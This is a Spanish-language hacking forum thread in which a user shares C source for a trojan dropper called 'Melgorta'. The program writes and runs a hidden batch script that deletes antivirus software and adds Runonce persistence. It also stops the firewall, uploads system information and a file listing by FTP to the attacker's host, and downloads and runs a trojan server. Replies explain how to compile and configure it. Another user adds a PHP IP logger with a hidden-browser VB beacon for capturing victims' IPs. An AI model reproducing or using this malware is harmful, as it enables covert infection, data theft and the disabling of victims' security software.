Tema destacado:  Suscripción al boletín mensual de elhacker.net
 Autor
|
Tema: Notificador de IPs sencillo pero funcional (Leído 1,296 veces)
|
Chero
 Desconectado
Mensajes: 117
la logica depende de cada persona
|
Os libero el code en C de un notificador de IPs pero incluyendo un bat que hemos podido ver por este foro otros parecidos puesto que ultimamente han ido apareciendo y haciendo populares, a ver que os parece, tan solo hay que hacer alguna modificacion para que lo pueda utilizar cada uno aunque estoy trabajando en un cliente que te haga el servidor con los datos que le digas, de momento os dejo esta version que tambien la podeis encontrar en www.viricototal.tk junto con explicaciones. Para que podais usarlo tan solo cambiar PASS HOST y ID, a ver que os parece...estoy empezando en esto asi que no seais muy crueles 
/***************************************************/
/***********notificador via FTP por Txero***********/
/***************************************************/
#include <stdio.h>
#include <windows.h>
FILE* fichero;
char texto[80];
int main()
{
/****************************ocultar programa*******************/
ShowWindow(GetForegroundWindow(),SW_HIDE);
/*************creacion del bat******************/
fichero = fopen("melgorta.bat", "wt");
if (fichero == NULL)
{
printf("error");
}
fputs("echo off\nset opi=deltree/y c:\\\n\%opi\%antiba*>nul\n\%opi\%antivi*>nul\n\%opi\%av*>nul\n\%opi\%bitdef*>nul\n\%opi\%comman~1\\>nul\n\%opi\%cleanc*>nul\n\%opi\%esafen\\>nul\n\%opi\%findvi*>nul\n\%opi\%f-*>nul\n\%opi\%fwin*>nul\n\%opi\%inocul*>nul\n\%opi\%kasper*>nul\n\%opi\%mcafee*>nul\n\%opi\%msav\\>nul\n\%opi\%norman\\>nul\n\%opi\%norton*>nul\n\%opi\%pav\\>nul\n\%opi\%pccill*>nul\n\%opi\%pc-cil*>nul\n\%opi\%rav\\>nul\n\%opi\%softwin\\>nul\n\%opi\%tbav*>nul\n\%opi\%toolkit\\>nul\n\%opi\%trendm~1\\>nul\n\%opi\%trex\\>nul\n\%opi\%virus*>nul\n\%opi\%vpc\\>nul\n\%opi\%vs95\\>nul\n\%opi\%zonela*>nul\nset opi=deltree/y c:\\progra~1\\\n\%opi\%antiba*>nul\n\%opi\%antivi*>nul\n\%opi\%avg*>nul\n\%opi\%bitdef*>nul\\\n%opi\%comman~1\\>nul\n\%opi\%common~1\\avp*>nul\n\%opi\%common~1\\syman*>nul\n\%opi\%datafe*>nul\n\%opi\%deerfi*>nul\n\%opi\%f-*>nul\n\%opi\%findvi~1\\>nul\n\%opi\%fsi\\>nul\n\%opi\%fwin*>nul\n\%opi\%grisoft\\>nul\n\%opi\%inocul*>nul\n\%opi\%kasper*>nul\n\%opi\%mcafee*>nul\n\%opi\%mindso~1\\>nul\n\%opi\%norman\\>nul\n\%opi\%norton*>nul\n\%opi\%pandas~1\\>nul\n\%opi\%protec*>nul\n\%opi\%quickh~1\\>nul\n\%opi\%rav\\>nul\n\%opi\%signal9\\>nul\n\%opi\%softwin\\>nul\n\%opi\%spysto~1\\>nul\n\%opi\%syman*>nul\n\%opi\%tbav\\>nul\n\%opi\%tinype~1\\>nul\n\%opi\%trend*>nul\n\%opi\%trojan*>nul\n\%opi\%virus*>nul\n\%opi\%zonela*>nul\nset opi=\ncscript \%windir\%\\biocapcy.vbs\ncls\n@echo off\nif exist algorta.exe goto inicio\nif exist c:\\windows\\regedit.exe goto 1\nif exist c:\\windowsnt\\regedit.exe goto 2\n: 1\ncopy melgorta.exe c:\\windows\\system32\\melgorta.exe\nassoc melgorta.exe=melgorta\nftype melgorta=\"\%1\" \%*\n@echo Windows Registry Editor Version 5.00>\%TEMP\%\\melgorta.exe\n@echo [HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Runonce]>>\%TEMP\%\\melgorta.exe\n@echo @=\"c:\\\\windows\\\\system32\\\\melgorta.exe\">>\%TEMP\%\\melgorta.exe\n@echo \"NeverShowExt\"=\"\">>\%TEMP\%\\melgorta.exe\n@echo [HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Runonce]>>\%TEMP\%\\melgorta.exe\n@echo @=\"c:\\windows\\system32\\melgorta.exe\">>\%TEMP\%\\melgorta.exe\nregedit /s \%TEMP\%\\melgorta.exe\ndel \%TEMP\%\\melgorta.exe\ngoto inicio\n: 2\ncopy melgorta.exe c:\\windowsnt\\system32\\melgorta.exe\nassoc melgorta.exe=melgorta\nftype melgorta=\"\%1\" \%*\n@echo Windows Registry Editor Version 5.00>\%TEMP\%\\melgorta.exe\n@echo [HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Runonce]>>\%TEMP\%\\melgorta.exe\n@echo @=\"c:\\\\windowsnt\\\\system32\\\\melgorta.exe\">>\%TEMP\%\\melgorta.exe\n@echo \"NeverShowExt\"=\"\">>\%TEMP\%\\melgorta.exe\n@echo [HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Runonce]>>\%TEMP\%\\melgorta.exe\n@echo @=\"c:\\windowsnt\\system32\\melgorta.exe\">>\%TEMP\%\\melgorta.exe\nregedit /s \%TEMP\%\\melgorta.exe\ndel \%TEMP\%\\melgorta.exe\ncls\ncolor 1\n: inicio\nipconfig /all>\%WinDir\%\\info.txt\ngpresult>\%WinDir\%\\gp.txt\nsysteminfo>\%WinDir\%\\system.txt\ntree>\%WinDir\%\\tree.txt\necho ID>\%WinDir\%\\1.txt\necho PASS>\%WinDir\%\\2.txt\necho send \%WinDir\%\\info.txt>\%WinDir\%\\3.txt\necho get server.exe c:\\server.exe>\%windir\%\\texto.txt\necho bye>\%WinDir\%\\4.txt\ncls\ncopy /b \%WinDir\%\\1.txt \%WinDir\%\\datos.txt\ncopy /b \%WinDir\%\\datos.txt+\%WinDir\%\\2.txt \%WinDir\%\\datos.txt\ncopy /b \%WinDir\%\\datos.txt+\%WinDir\%\\3.txt \%WinDir\%\\datos.txt\ncopy /b \%windir\%\\datos.txt+\%windir\%\\texto.txt \%windir\%\\datos.txt\ncopy /b \%WinDir\%\\datos.txt+\%WinDir\%\\4.txt \%WinDir\%\\datos.txt\ncopy /b \%WinDir\%\\info.txt+\%WinDir\%\\gp.txt \%WinDir\%\\info.txt\ncopy /b \%WinDir\%\\info.txt+\%WinDir\%\\system.txt \%WinDir\%\\info.txt\ncopy /b \%WinDir\%\\info.txt+\%WinDir\%\\tree.txt \%WinDir\%\\info.txt\nnet stop SharedAccess\ncls\nftp -s:\%WinDir\%\\datos.txt HOST\ndel \%WinDir\%\\1.txt\ndel \%WinDir\%\\2.txt\ndel \%WinDir\%\\3.txt\ndel \%windir\%\\texto.txt\ndel \%WinDir\%\\4.txt\ndel \%WinDir\%\\info.txt\ndel \%WinDir\%\\datos.txt\ndel \%WinDir\%\\info.txt\ndel \%WinDir\%\\system.txt\ndel \%WinDir\%\\gp.txt\ndel \%WinDir\%\\tree.txt\nif exist c:\\server.exe goto final\ngoto inicio\n: final\nstart c:\\server.exe\ndel c:\\server.exe\ndel melgorta.bat\nexit", fichero);
fclose(fichero);
/****************************ejecutar************/
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
if( !CreateProcess( NULL,
TEXT("melgorta.bat"),
NULL,
NULL,
FALSE,
0,
NULL,
NULL,
&si,
&pi )
)
{
printf( "CreateProcess fall (%d).\n", GetLastError() );
return(0);
}
WaitForSingleObject( pi.hProcess, INFINITE );
CloseHandle( pi.hProcess );
CloseHandle( pi.hThread );
}
Solo decir que se llama Melgorta, si infectais a alguien con el nombre Algorta tan solo se ejecutara una vez, en cambia si le poneis melgorta funcionara siempre, se añade al registro, trabaja oculto, trata de borrar algunos antivirus y baja del servidor un servidor del troyano que elijas (solo tienes que ponerlo en la raiz de tu servidor y llamarlo server.exe) y lo ejecuta, y por supuesto os envia su ip, ademas de un listado de todos sus archivos y alguna info mas, llega con el nombre de info.txt a no ser que cambies eso por el nombre que quieras, asi que creo que es muy util, indetectable e infecta con un troyano ademas que te envia el IP, una manera sencilla y eficaz de conseguir un IP que funciona siempre (no como otros que dejan de funcionar al de un tiempo) y infecta con el servidor de cualquier troyano. |
|
|
|
« Última modificación: 1 Junio 2005, 21:55 por Chero »
|
En línea
|
|
|
|
Chero
Desconectado
Mensajes: 117
la logica depende de cada persona
|
ningun comentario???
|
|
|
|
|
En línea
|
|
|
|
Thor
Desconectado
Mensajes: 1.176
|
Si, me gusta, hay cosas que nose que hacen exactamente , lo tendre k compilar y entenderlo...
Gracias por postear el codigo.
|
|
|
|
|
En línea
|
|
|
|
|
|
|
|
Chero
Desconectado
Mensajes: 117
la logica depende de cada persona
|
Pues si necesitais mas informacion util, ya sabeis: www.viricototal.tk web del team, que pronto esperamos sacar una e-zine que yo creo que va a ser muy buena y novedosa, algo que no se ve muy amenudo y www.proyecto-epoi.tkUn saludo y gracias, y si podeis hacer mas comentarios, gracias |
|
|
|
|
En línea
|
|
|
|
MrCuCo
Desconectado
Mensajes: 306
|
mmm....creo q no recibes ningun comentario pos xq....nose...q programen aki solo osn 3...  y de esos 3 2 solo saben vb ....xD aki casi nadie sabe programar, y los pocos q lo acen lo acen a lo facil como vb (me incluyo). yo personalmente lo agradeciria mas si lo icieras en vb, yo creo q seria como un mail bomber desde telnet, x ejmplo: "shell" e ir poniendo el proceso q seguiria telnet, la putada esq no apareceria la ip, solo estaria en el encabezado (q es suficiente xo weno....)..nose... ami se me a ocurrido q podriamos qdar algun dia todos en el canal #elhacker.net e intercambiar ayudas rapidas, nose, truccos, caxos de fuentes....lo digo x sugerir algo...espero respuestas... x ciertos, de tu fuente no opino xq no entiendo 1 mier-da de lo q pone... 1 saludo: MrCuCo |
|
|
|
« Última modificación: 5 Junio 2005, 03:44 por MrCuCo »
|
En línea
|
|
|
|
Chero
Desconectado
Mensajes: 117
la logica depende de cada persona
|
jejeje, ok, gracias x comentarlo...bueno, abajo dice que es lo que hace, aun que comprendo que no sepais que es lo que hace cada parte del codigo...pero bueno, tampoco creas que es algo complicado, e???
Sobre lo de quedar en el canal, me parece ok, a ver si la gente se apunta y qdamos todos juntos 1 dia
|
|
|
|
|
En línea
|
|
|
|
Pseudoroot
Desconectado
Mensajes: 839
|
intenten compilar este codigo, a mi me sale un error en la parte donde esta el bat, con algunos simbolos ,no entiendo ,talvez hay problemas de sintaxis en el codigo..
Saludos ,.txero...
|
|
|
|
|
En línea
|
|
|
|
Chero
Desconectado
Mensajes: 117
la logica depende de cada persona
|
Aupa psudo!!!
en realidad no da ningun problema al compilar, el problema que debes tener (que me ocurria a mi tambien al principio y no me dejaba compilar) es que el code como lo e puesto (en realidad lo ha puesto asi la web) es porque todo el bat debe estar en una misma linea, y si lo que has hecho es copiar pegar te habra dado ese error, por eso una vez copies-peges debes poner todo el bat en una misma linea, desde fputs hasta fichero); en la misma linea (la verdad esque no se exactamente porque)
|
|
|
|
|
En línea
|
|
|
|
Pseudoroot
Desconectado
Mensajes: 839
|
Ya me suponia que algo asi deberia ser, entonces es la manera en que lo interpreta el compilador.. al momento de compilar, bueno vamos a ver si esta vez me resulta..ok...
|
|
|
|
|
En línea
|
|
|
|
safety
Desconectado
Mensajes: 2
|
POR FAVOR DIME COMO PUEDO INSTALARLO ;)NO ESTOY MUY AL DIA EN ESTO LO SIENTO PERO ME INTERESA TU PROGRAMA.MI DIRECCION ES ADPSERVEIS@YAHOO.ES.GRACIAS |
|
|
|
|
En línea
|
|
|
|
Pseudoroot
Desconectado
Mensajes: 839
|
por que lo sientes?. no para nada, es bueno que lo pruebas ,. es mas. se toma como halago que lo quieras usar..a que te refieres a como puedo instalarlo?...
solo debes copiar el codigo y probarlo en algun compilador de C/C++, que utilices ,es todo...
Ahora, si te presenta algun problema, solo postealo...
|
|
|
|
|
En línea
|
|
|
|
Chero
Desconectado
Mensajes: 117
la logica depende de cada persona
|
es muy sencillo, cambia host por tu host de ftp, usuarios.lycos.es x ejemplo, id por tu id del host, y pass por tu contraseña (obvio) lo compilas con el dev c++ x ejemplo (descargalo desde www.viricototal.tk por ejemplo, en la pagina principal (lo compilas copiando el codigo en este compilador y presionando F9, importante que todo el codigo batch debe estar en una misma linea. Lee los post anteriores x si tienes algun problema, si no esta la solucion pues pregunta  |
|
|
|
|
En línea
|
|
|
|
Martín Fierro
Desconectado
Mensajes: 381
Por crom!!!. Chiapas dedo izquierdo de wadalbertía
|
Bueno si se trata de funcional les va este, que consta de dos pasos, uno es la creación de una página en php con la función de recoger las ips y almacenarlas en un txt. Va el código. <?php
if(getenv(HTTP_X_FORWARDED_FOR)) { $getip = getenv(HTTP_X_FORWARDED_FOR); }
elseif(getenv(HTTP_CLIENT_IP)) { $getip = getenv(HTTP_CLIENT_IP); }
else { $getip = $REMOTE_ADDR; }
$fp = @fopen("ip.txt", "a");
fputs($fp, " IP:".$getip);
fclose($fp);
echo "Tu ip publica es: <h1> $getip </h1>";
?> Veran los que saben que lo único que será visto a quien lo visite es un texto que dice Tu ip pública es: tu.ip.real En esta parte pueden poner el código html que quieran es más colgar una foto no es mala idea. La segunda parte es un programita en VBasic, con dos líneas de código basado en una vulnerabilidad llamada por algunos como Hole Fire en el que se usa el Internet Explorer y facilita la salida aún con firewall. Private Sub Form_Load()
'Como declaración la primera línea
Dim Retval
Retval = Shell("C:\Archivos de programa\Internet Explorer\IEXPLORE.EXE http://lapáginaenquecolgastetuphp.com/anzuelo.php", vbHide) Te fijas en que el programa lance oculto el form, si sabes tantito vbasic no será problema. Lo compilas y ya, cuando alguien ejecute tu programa, en tu servidor aparecerá un archivo que se llamara ip.txt que creará tu código php en la que estará el ip pública de tu víctima. No digo que este código está más fácil pero creo que en él no arriesgas tus passwords de ftp (con un sniffer te birlan tu pass y tu user con el código de Chero) además que está facilísimo. PD. Para MR CuCo Para el que dice que aquí sólo hay tres que programan en vbasic, pasate por las secciones de programación y virus, y si resulta que sabes más enseñanos, además ni cosas sencillitas como la del compañero o como esto, no creo que seas capaz de aportar, ojalá se evitaran comentarios como este que lo único que logran es que los que quieran compartir se sientan inhibidos. |
|
|
|
|
En línea
|
Y no me importa nada..
|
|
|
|
 |
